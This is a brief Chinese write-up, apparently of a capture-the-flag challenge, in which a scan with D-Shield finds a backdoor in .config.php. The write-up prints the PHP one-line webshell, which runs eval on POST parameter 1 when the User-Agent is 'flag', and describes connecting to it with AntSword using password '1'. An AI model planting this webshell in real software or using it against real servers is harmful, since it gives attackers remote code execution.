用d盾扫描后,发现存在后门,打开.config.php文件 、、、 <?php if (@$_SERVER['HTTP_USER_AGENT'] == 'flag'){ eval($_POST[1]); } ?> 、、、 发现这个就是对一句话木马的报头有一个User-Agent限制,改成flag,然后用蚁剑连接就可以了,密码为1